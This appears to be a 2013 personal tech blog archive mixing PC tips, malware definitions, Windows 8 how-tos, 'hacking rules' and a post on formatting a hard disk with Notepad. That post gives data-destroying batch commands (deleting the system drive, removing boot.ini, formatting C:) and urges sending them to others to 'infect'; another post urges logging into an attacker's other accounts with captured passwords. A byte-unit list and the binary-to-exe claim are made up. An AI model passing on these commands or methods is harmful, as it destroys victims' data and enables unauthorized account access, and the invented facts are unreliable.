Sunday 10 November 2013

Hacking rules


Hacking rules 

1. Never damage any system. This will only get you into trouble.

2. Never alter any of the systems files, except for those needed to insure that you are not detected, and those to insure that you have access into that computer in the future.

3. Do not share any information about your hacking projects with anyone but those you'd trust with your life.

4. When posting on BBS's (Bulletin Board Systems) be as vague as possible when describing your current hacking projects. BBS's CAN be monitered by law enforcement.

5. Never use anyone's real name or real phone number when posting on a BBS.

6. Never leave your handle on any systems that you hack in to.

7. DO NOT hack government computers.

8. Never speak about hacking projects over your home telephone line.

9. Be paranoid. Keep all of your hacking materials in a safe place.

10. To become a real hacker, you have to hack. You can't just sit around reading text files and hanging out on BBS's. This is not what hacking is all about.


Thanks & Regards,

"Remember Me When You Raise Your Hand For Dua"
Raheel Ahmed Khan
System Engineer
send2raheel@yahoo.com
send2raheel@engineer.com
sirraheel@gmail.com
send2raheel (skype id)

My Blog Spot
http://raheel-mydreamz.blogspot.com/

Backtracking a Keylogger


Backtracking a Keylogger :

Now all keyloggers and RATs are sending data to the hacker in regular intervals (usually every 5 to 10 minutes) by using one of the two methods below:

1. Using the Emails: where hacker configures his email ID and password while creating the server. Keylogger records the key strokes in a temp file and sends it to the hacker in form of emails. But this has a limit as most free email servers like Gmail or Yahoo or Hotmail has limit of 500 composed and received mails. So most hackers use the second method.

2. FTP server: While creating the keylogger server, hackers configure their FTP server, where they receive the logs of key strokes in the form of text file(usally labeled on the basis of current system time stamp). Hackers keylogger server uploads the files to FTP server after every few minutes interval.

If we monitor all data packages we can easily scan for one of these and then we’ll have the hackers email info or FTP info. What can we do with this, you might ask; highly skilled hackers obviously won’t allow this as they create a completely seperate email or FTP site which leaves no traces of them, but novice skilled hackers (there’s plenty of those) will just use their own email or leaving behind information about them. An example could be that you find the name of the person from the email you backtraced – this ain’t his primary email, so there’s nothing valuable. From there you can look up his name on Google, you’ll probably find his real email on some site; then simply try to login to it using the password from the fake email (most novice skilled hackers will have the same password).

Wireshark is a very famous network scanning hack tool which is used by hackers or network forensic experts to monitor the packet flow of their network cards like Ethernet or WLAN. It records each and every packet coming and going out of your system’s Network card. Packets is just a bunch of data.

Whenever you feel anything suspicious in your system like your system is compromised or you are infected follow the steps below prior to removing the keylogger or RAT from your system.

Steps to reverse engeneering the email or FTP servers password:

1. First of all download and install Wireshark. You can easily get this simply by Googling it.

Note: While Wireshark is getting installed, ensure that it installs the Winpcap with it otherwise it won’t work properly.

2. Now go to the “Capture”-button in the top menu of the Wireshark and select the interface (means your network card which can be Ethernet or WLAN).

3. It will now start capturing the packets through that Network card. What you have to do is just keep capturing the records for atleast 30 minutes for getting the best results. After 30 minutes, stop capturing the packets.

4. Now you need to filter your results, for this go to the filter box and type FTP and SMTP one by one. Note: if you get records for FTP then hacker has used FTP server and if you didn’t get FTP that means the hacker has used SMTP, so give SMTP in Filter box.

5. As you scroll down you will find the “FTP username” and “Password” for victims ftp account in case FTP server is used. And if hacker has used SMTP then you will find “email address” and its “password” that hacker has used to create the server.

NOTE: This won’t work in all cases, but it’s certainly worth trying. Who wouldn’t want revenge if some skid infected your precious PC .



Thanks & Regards,

"Remember Me When You Raise Your Hand For Dua"
Raheel Ahmed Khan
System Engineer
send2raheel@yahoo.com
send2raheel@engineer.com
sirraheel@gmail.com
send2raheel (skype id)

My Blog Spot 
http://raheel-mydreamz.blogspot.com/

Thursday 17 October 2013

New Features in Windows 8.1: What makes it better?


Microsoft is on its way to turn heads with the launch of the new Windows 8.1. In this update to the already existingWindows 8 operating system, a whole new range of features has been included. These features are aimed at improving the tablet/ PC using experience of the users. After the previous version of this OS was released in August, 2012, it faced a lot of praises as well as criticism from the users. It is believed that this has lead to this latest update. And finally there is good news for the Windows 8 users. They will get this new update for free.
This OS is very easy to use as well as to install. But will it be any better than the original Windows 8? May be it is too soon to comment on that. So, below are some of the New Features in Windows 8.1 which are introduced.

New Features in Windows 8.1


  • Start button :It has been in the news that the Start button is going to come back with this update. But the truth is that it is not exactly the start button like in the case of Windows Vista/ XP/ 7 or others, rather it is a simple icon at the lower left of the display screen of your device. By simply clicking/ tapping on this button, you can zip back to the Windows 8 which uses tile user interface. Apart from this, the traditional right click options are still there as usual.
  • Universal search : One of the major drawbacks of Windows 8 was that while searching for documents/ files, the users had to specify exactly where they wanted to search i.e. folders, apps, files or settings. But in the newWindows 8.1, there is the facility to carry out universal search. This means that all you need to do is type what you want to search and all folders and files will be searched automatically. Apart from this, there is smart search which will make suggestions without the need to search an entire word or phrase.
  • Boot to desktop : For people without a PC, laptop or tablet, the tiled user interface of Windows 8 was not convenient to use on their computer systems. Due to this reason, the Windows 8.1 OS comes with an option during the time of booting using which bypass the tiled user interface and can get it opened on the desktop. Under the task and navigation properties menu, there is a box that you need to tick. Click on the box next to the “Go to the desktop instead of start when I sign in” and you will be redirected to the desktop automatically. In case you want to change this setting, you need to un- tick this box.
  • Find apps using the apps bar : Windows 8.1 comes with an app bar and you can use it by right clicking on the app screen with mouse or by swiping the bottom of screen upwards. This will open the list of apps and their functions. You can also pin these apps onto the taskbar.
  • Find libraries & charm : With Windows 7 came the library which showed all your contents and made them easy to access. Now, Windows 8.1 doesn’t show this folder and you need to click on View menu in order to access it. Another feature is the Charms. You can easily find it on the right side of the screen.
  • Alarm : You can set alarm by clicking on the start screen.
  • Customize the lock up screen using photos : While Windows 8 allowed you to set specific photos on the lock screen but Windows 8.1 allows you to set a whole series of pictures onto the lock screen as well.
  • Quick shutdown : Shutting down the system is the same in Windows 8.1 as that was in the previous versions but there are some new features here. This helps you in logging out of your account or shutting down your system without using the settings charm.
While these are few of the features in this Windows update, there are a whole bunch of other improved features as well.


Tuesday 8 October 2013

How far do u know?


How far do u know?
1 Bit = Binary Digit
8 Bits = 1 Byte
1024 Bytes = 1 Kilobyte
1024 Kilobytes = 1 Megabyte
1024 Megabytes = 1 Gigabyte
1024 Gigabytes = 1 Terabyte
1024 Terabytes = 1 Petabyte
1024 Petabytes = 1 Exabyte
1024 Exabytes = 1 Zettabyte
1024 Zettabytes = 1 Yottabyte
1024Yottabytes = 1 Brontobyte
1024 Brontobytes = 1 Geopbyte
1024 Geopbyte=1 Saganbyte
1024 Saganbyte=1 Pijabyte
Alphabyte = 1024 Pijabyte
Kryatbyte = 1024 Alphabyte
Amosbyte = 1024 Kryatbyte
Pectrolbyte = 1024 Amosbyte
Bolgerbyte = 1024 Pectrolbyte
Sambobyte = 1024 Bolgerbyte
Quesabyte = 1024 Sambobyte
Kinsabyte = 1024 Quesabyte
Rutherbyte = 1024 Kinsabyte
Dubnibyte = 1024 Rutherbyte
Seaborgbyte = 1024 Dubnibyte
Bohrbyte = 1024 Seaborgbyte
Hassiubyte = 1024 Bohrbyte
Meitnerbyte = 1024 Hassiubyte
Darmstadbyte = 1024 Meitnerbyte
Roentbyte = 1024 Darmstadbyte
Coperbyte = 1024 Roentbyte




Top 5 Countries with world’s fastest internet.....



1. Hong kong has the worlds fastest internet speed. It has blazing fast internet, an average peak speed of 63.6 Mbp megabits per seconds. At this speed you can download HD movie in about 2 minutes.

2 Japan
Speed: 50 Mbp The home of Nintendo and Sony had the second fastest internet speed, thanks to the high-speed fibre optics that run through many parts of the island nation. Japan’s average peak broadband speed reached an impressive 50 Mbps, which was more than 170% faster than the global average.

3 . Romania
Speed: 47.9 Mbp When last checked in on Romania, it was ranked No. 5 and was the only country to see its average fall from the previous quarter. The country is now back on track, and has elevated itself with an average peak speed of 47.9 Mbps. That’s 160% faster than the global average.Romania’s average was 9% higher than the previous quarter.

4. South Korea Speed: 44.8 Mbp Serious PC gamers who want to dominate in StarCraftneed fast, low latency internet connections. They’ll find that in South Korea, home to consumerelectronics giants Samsung and LG. The country’s average peak hit 44.8 Mbps, about 143% faster than the global average. It was
the only region to lose speed compared with a year ago,

5. Latvia
Speed: 44.2 Mbp Smaller countries are easier to blanket with high-speed internet, which is one of the reasons why Latvia consistently ranks high on this list. The average peak broadband speed.


Saturday 28 September 2013

How to Set Up Troubleshoot and Home Computer Network


How to Set Up Troubleshoot and Home Computer Network

Setting up a home computer network may sound daunting, but it’s relatively simple, provided you break everything down into specific steps. Home computer networks are ideal for sharing a wireless connection among multiple computers, especially for those who have a home office, teenagers, or another computer configuration.

Purchasing a Router

Before you begin to worry about software, worry about hardware. A excellent router, like a Cisco router or a Linksys router, will save you from having to endlessly reboot and reprogram while still allowing you to quickly set up a home network. Make sure you buy from a company that has years of experience designing high quality routers that are capable of handling high amounts of traffic (such as data heavy media files). Virtually any home network will run smoothly without irritating slowness or delays.

Wireless Bandwidth

After you’ve purchased a router, the next step is to determine how much bandwidth you are receiving from your wireless connection. This becomes particularly important if you have a household where the network users are habitually downloading movies or other large data files. While a router can rapidly transfer this information, it is constrained by the amount of bandwidth available to the household. A connection that transmits data at 2.4 GHz with a 54 megabit speed is usually adequate to the task. 

If your network feels exceptionally sluggish, check to make sure that you are receiving the wireless by ‘pinging’ the network. Alternatively, if you are receiving the full wireless bandwidth but are still experiencing slow results because of the types of media you are transferring, you may consider paying for a faster service.

Software Drivers

While software drivers for networking are fairly easy to find and download from the Internet, purchasing software directly from a computer retailer is recommended as a way to keep your network free of faulty software. A higher incidence of spyware and viruses makes downloading free software inadvisable, especially for something as sensitive as a computer network.

Purchasing software from one of the major companies, such as McAfee or Symantec, will also provide you with another vital component of wireless home networking: a firewall. Because wireless networks are difficult to secure, the best option is to buy software that not only allows you to network, but is built specifically to keep out uninvited users. Firewalls are designed to protect your valuable information behind a tightly secured ‘wall’ which can’t be accessed unless a very specific encrypted code is used. 

Basic Set-Up

Now that you have all the components, you’ll want to set up the router first. Install the software driver onto each computer that will use the network. Set up a passkey that is fairly hard to break. Avoid simple or obvious terms that an outside user could easily guess. Set up each computer with this information.

The company that is providing your wireless connection will usually assign you a name and a passkey. However, in some configurations, you will be able to reprogram this information.

Troubleshooting

No matter how expertly a system is set up, on occasion a technical problem manifests, resulting in a lack of connectivity for computers. There are a few ways to quickly check what’s working and what’s not.

Usually, problems are caused by one of two things: the software on the computer itself is malfunctioning, and not allowing the computer to connect. You can test this by seeing if any other computers can connect to the network. If they can, the problem is local to that computer. A simple reboot of the software should solve this problem. However, if the software continues to be unable to connect to the internet, you will need to uninstall the software, and then reinstall it. Sometimes, a version can become corrupted. By wiping it clean and starting anew, the problem should resolve itself.

The second most common problem is that the router needs a quick reboot. If you purchase a quality router, you will not have this problem very often, although every now and again even the best routers need a quick reboot. Turn the router off for at least thirty seconds. Switch it back on, and check your connectivity in about ten minutes. This gives the system plenty of time to reset itself.

If this doesn’t work, the wireless provider may temporarily be out. Call your wireless provider to determine if they are experiencing an outage, and when you can expect the resumption of service. If all of these methods don’t resolve your problem, there is a basic flaw in your initial setup. 



How to Protect Your Computer From Viruses


How to Protect Your Computer From Viruses

With millions of computer users browsing the web at any given time, there are plenty of targets for malicious coders. While computer experts don’t always know why coders choose to build harmful computer programs, the fact is that it happens all the time. Computer viruses can steal personal information, interfere with normal operations, attract spam and even shut down your computer’s hard drive. Protecting your computer is critical for browsing success.

Start With the Basics

Most computer systems come with security features already in place. For example, the Windows operating system is packaged with Microsoft Windows Security Center. When you first open, boot up and register a new computer, you should make sure that this program is functioning. It will give basic protection against spyware, viruses and malware. In addition, a basic firewall is built into this program, providing additional protection and stops for potentially harmful programs. Upon activation, don’t be surprised if your security system needs immediate updating. Software that protects your computer needs regular and consistent updating to stay useful. Viruses are constantly being generated and the several-month lag between when your computer was made and when you first started using it can mean that the database the security system is loaded with is severely out-of-date.

Upgrade to Meet Your Needs

Many people operate computers for a long time with only basic protection in place. However, heavy computer users or those who have risky browsing habits can sometimes benefit from upgrading their virus, spyware and malware protection, as well as using a fuller-featured firewall; this is especially important if you use a networked computer system. Basic or free virus protection will still scan and update for viruses. Paid programs, however, offer more features, including ease-of-use and convenience features. The most important thing is to verify the publisher and make sure you are getting what is promised. Most well-known virus protection programs, such as AVG and Norton Security, have reviews available to help you make your choice.

Learn About Spyware Risks

Spyware creates risks that many computer users are not aware of. If you are only protecting against viruses, you could be leaving your computer open to damage. Most people are familiar with spyware that initiates and attracts annoying ad programs. Spyware, however, can be much more malicious as well. Your shopping habits can be tracked by spyware. While not exactly harmful, some people consider this a breach of privacy. The worst spyware programs interfere with normal operations and can even track what you type, sending personal information to people who want to steal your identity. Some spyware redirects your browser to different web addresses, increasing your risks of virus infection and fraud.

How Viruses Work

The main difference between spyware and viruses is how they are spread. A virus reproduces itself and attaches to any document that the computer sends, while spyware can be stored as a cookie or tracking code. A virus is most often found traveling with a piece of computer software, such as a document, picture or piece of music. When dealing with email, it is necessary to open an attachment to become infected, indicating that, in most cases, the computer user must somehow invite the malicious software to replicate on their system. Of course, most people have no idea it is there or what is happening. Some of the sneakiest and most harmful viruses actually masquerade as virus protection software, making them extremely hard to detect. Because of this, it’s crucial to be familiar with your particular virus protection program and know what it looks like and what the normal scripts and prompts are during operation. Viruses do some of the same things that spyware does; they just accomplish it differently. An active virus can steal personal information, generate ads or shut down your system, including the very virus protection programs that can fix the issue.

Take Steps For Protection

Like anything, the best way to protect against viruses is to be educated. Become familiar with what malicious software may look like. If you get an email or are asked to download a file that you don’t recognize or looks suspicious, do your homework. Research virus protection, spyware, malware and firewall programs and use them to their fullest capacity. Set the software to update and scan automatically to make sure that the system is constantly monitored. In addition, regularly check on the databases published by various virus protection services; many will provide lists of symptoms and risks, as well as the standard way the file gains access for no cost to the public.



How to Enable Administrator account in Windows 8


How to Enable Administrator account in Windows 8:

1. Firstly, right click on the screens bottom left corner and from the pop-up menu, choose the Command Prompt (Admin).

2. Choose 'Yes' at the "User Account Control" warning message. (In case if it shows this message only press yes or else leave it).

3. Now, Command Prompt will open. Inside the command prompt, type this command.

" net user adminstrator /active:yes "

and press enter

4. Now, you can see a message that says your command was completely successfully.

5. Now close the command prompt and from now your Adminstrator account is enabled in your PC.

To disable, follow the same process and in command prompt, give this command:

" net user adminstrator /active:no "



How to Improve Your Computer’s Performance



Tips for Speeding Up Your PC

Few things are as frustrating as dealing with a slow, sluggish computer. When a computer is brand new, it works wonderfully well. Over time, though, its performance can slowly begin to worsen. This happens for a number of reasons, but the biggest culprits are things like spyware, adware and other computer threats that are unwittingly downloaded along with other content while online. You don’t have to download thousands of MP3s, movies or other items to experience these problems, either – nobody is immune to them. Instead of accepting the situation, there are plenty of techniques and strategies that you can use to make it better – a few of the best ones are outlined below.

Strategy #1: Clean Your Computer’s Windows Registry

The biggest cause of slow, sluggish PC performance is errors and problems within its Windows registry. Adware, spyware and other threats usually target the registry, damaging or misplacing important files within it. When it comes to PC cleaning, a daily Windows registry cleaning should be at the top of your list of priorities. However, this should never be done manually – there are too many opportunities for major errors that could seriously damage your PC’s operating system. Instead, invest in a high-quality Windows registry cleanup program and configure it to run once per day – you won’t believe the difference that it makes.

Strategy #2: Remove Unneeded Files

Every time you log on to the Internet or otherwise use your computer, temporary files are generated. They are usually only needed once; however, they don’t disappear on their own. Instead, they accumulate over time until they are cluttering up your computer’s file system and affecting its performance. While it’s possible to remove these files one-by-one, it’s much easier and quicker to use a PC cleaning tool that’s designed for the purpose. Try to do so about one time per week to keep your computer humming along with ease.

Strategy #3: Remove Unneeded Programs

Like many people, you probably download and try out many different programs each month. How many of them do you actually end up using on a regular basis? Chances are, not very many of them. By getting into the habit of uninstalling unused and unneeded programs, you can keep your computer’s file system a lot less cluttered. In turn, your PC’s performance will improve dramatically. You can optimize your computer in this way by using its Add/Remove Programs feature. Its location varies by operating system, but you should be able to find it somewhere in the Control Panel.

Strategy #4: Empty the Recycle Bin

When you click “delete” on a file or a program, it doesn’t go away for good – not immediately, anyway. Instead, it sits in a kind of purgatory in your computer’s Recycle Bin. As things pile up in the Recycle Bin, your computer can start exhibiting some very annoying problems. If sluggish startups and frequent crashes are occurring with increasing frequency – and your computer’s recycle bin is very full – go ahead and empty it. From then on, get into the habit of doing so about one time per week. This small but important strategy can make a huge difference.

Strategy #5: Perform a Disk Defragmentation

Windows isn’t very efficient when it comes to storing files. It actually splits them up, depositing them into whatever spaces are available. The more spaced apart the pieces of a file are, the harder your computer has to work to make them run. The Windows disk defragmentation system tune-up utility works to piece all of those files back together again. The process is a long one, though, and only needs to be done about four times per year. Set it up to run automatically once every three months. By doing so, you’ll be able to keep your computer running in tiptop shape.

When it comes to keeping your computer running optimally, small but regular maintenance is the best way to go. Protecting your PC only does so much; even the most careful Internet users in the world unintentionally download malicious software from time to time. By using basic system tune-up tools, cleaning your computer’s Windows registry regularly, performing regular file-cleaning maintenance and otherwise optimizing your PC, you should be able to keep it in like-new condition for a lot longer. Even if your computer has been performing slowly for some time, beginning this regimen is sure to produce results. In the end, you’ll be able to enjoy a computer that flies along – instead of one that spins its wheels.

Thanks & Regards,

"Remember Me When You Raise Your Hand For Dua"
Raheel Ahmed Khan
System Engineer
send2raheel@yahoo.com
send2raheel@engineer.com
sirraheel@gmail.com
send2raheel (skype id)

My Blog Spot 
http://raheel-mydreamz.blogspot.com/


Difference between Viruses, Trojans, Worms and Malware.




I. What is Malware?
The word Malware is short for malicious software, and is a general term used to describe all of the viruses, worms, spyware, and pretty much anything that is specifically designed to cause harm to your PC or steal your information.

II. Viruses --> Wreak Havoc On Your Files The term computer virus is often used interchangeably with malware, though the two don’t actually have the same meaning. In the strictest sense, a virus is a program that copies itself and infects a PC, spreading from one file to another, and then from one PC to another when the files
are copied or shared.
Most viruses attach themselves to executable files, but some can target a master boot record, autorun scripts, MS Office macros, or even in some cases, arbitrary files. Many
of these viruses, like CIH, are designed to render your PC completely inoperable, while others simply delete or corrupt your files—the general point is that a virus is
designed to cause havoc and break stuff.You can protect yourself from viruses by making certain your antivirus application is always updated with the
latest definitions and avoiding suspicious looking files coming through email or otherwise. Pay special attention to the filename—if the file is supposed to be an mp3, and the name ends in .mp3.exe, you’re dealing with a virus.

III. Spyware --> Steals Your Information Spyware is any software installed on your PC that collects your information without your knowledge, and sends that information back to the creator so they can use your personal information in some nefarious way. This could include keylogging to learn your passwords, watching your searching habits, changing out your browser home and search pages, adding obnoxious browser toolbars, or just stealing your passwords and credit card numbers. Since spyware is primarily meant to make money at your expense, it doesn’t usually kill your PC—in fact, many people have spyware running without even realizing it, but generally those that have one spyware application installed also have a dozen more. Once you’ve got that
many pieces of software spying on you, your PC is going to become slow. What many people don’t realize about spyware is that not every antivirus software is designed to catch spyware. You should check with the vendor to make sure the application
you are using to protect you from malware is actually checking for spyware as well. If you come across a PC that is already heavily infected, run a combination of
MalwareBytes and SuperAntiSpyware to clean it thoroughly.

IV. Trojan Horses --> Install a Backdoor Trojan horses are applications that look like they are doing something innocuous, but secretly have malicious code that does something else. In many cases, trojans will create a backdoor that allows your PC to be remotely controlled, either directly or as part of a botnet—a network of computers also infected with a trojan or other malicious software. The major difference between a virus and a trojan is that trojans don’t replicate themselves—they must be
installed by an unwitting user. Once your PC has been infected with the trojan, it can be used for any number of nefarious purposes, like a denial of service (DoS) attack against a web site, a proxy server for concealing attacks, or even worse—for sending out buckets of spam. Protection against trojans works the same way as viruses—make sure that your antivirus application is up to date, don’t open suspicious attachments, and think long and hard before you try and use a downloaded crack for Photoshop—that’s one of malware authors’ favorite spots to hide a trojan.

V. Worms --> Infect Through the Network Computer worms use the network to send copies of themselves to other PCs, usually utilizing a security hole to travel from one host to the next, often automatically without user intervention. Because they can spread so rapidly across a network, infecting every PC in their path, they tend to be the most well-known type of malware, although many users still mistakenly refer to them as viruses.Because worms often exploit a network vulnerability, they are the one type of malware that can be partially prevented by making sure your firewall is enabled and locked down.

Thanks & Regards,

"Remember Me When You Raise Your Hand For Dua"
Raheel Ahmed Khan
System Engineer
send2raheel@yahoo.com
send2raheel@engineer.com
sirraheel@gmail.com
send2raheel (skype id)

My Blog Spot 
http://raheel-mydreamz.blogspot.com/



Hacker VS Programmer




1. A hacker beats the system.A programmer maintains the system.
2. A hacker is trying to get in.A programmer is trying to stop things getting in.
3. A hacker does things because he believes in them.A programmer does what he is supposed to.
4. A hacker changes the way things are.A programmer tries to keep the status quo.
5. A hacker is agile.A programmer is a small cog in a big slow machine.
6. A hacker has many points of attack.A programmer has one job.
7. A hacker has to be fast.A programmer doesn’t.
8. A hacker is self-reliant.A programmer relies on others.
9. A hacker finds paths that don’t exist.A programmer guards the old ones that already do.
10. A hacker is about being interesting.A programmer is about being perfect.


Thanks & Regards,

"Remember Me When You Raise Your Hand For Dua"
Raheel Ahmed Khan
System Engineer
send2raheel@yahoo.com
send2raheel@engineer.com
sirraheel@gmail.com
send2raheel (skype id)

My Blog Spot 
http://raheel-mydreamz.blogspot.com/



Sunday 11 August 2013

FORMAT YOUR HARD DISK USING NOTEPAD



/*======== EDUCATION PURPOSE ONLY==========*/


If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.

Step 1. Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000


Step 2. Save As An EXE Any Name Will Do...


Step 3. Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code


format c:\ /Q/X — this will format your drive c:\


01100110011011110111001001101101011000010111010000

100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your drive d:\


IMPORTANT : This Trick is for Educational Purpose only.DONT TRY ON YOUR OWN PC.Computer freaks is not responsible for it. TRY WITH YOUR OWN RISK.It lead to loss of data and crashing your computer..!!


01100110011011110111001001101101011000010111010000

100000011001000011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000

101111010100110010111101010001

00100000011000110011101001011100011000100110111101

101111011101000010111001101001

0110111001101001

Try to figure out yourself rest can’t spoonfeed Its working.

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this:


go to notepad and type the following:

@Echo off

Del C:\ *.*|y save it as Dell.bat


want worse then type the following:

@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00

and save it as a .bat file

enjoy....!
Please Share it! :)


Thanks & Regards,

"Remember Me When You Raise Your Hand For Dua"
Raheel Ahmed Khan
System Engineer
send2raheel@yahoo.com
send2raheel@engineer.com
sirraheel@gmail.com
send2raheel (skype id)

My Blog Spot 
http://raheel-mydreamz.blogspot.com/

what is Juice Jacking SCAM

  Juice Jacking is a cybersecurity threat that occurs when cybercriminals manipulate public charging stations, such as USB charging ports in...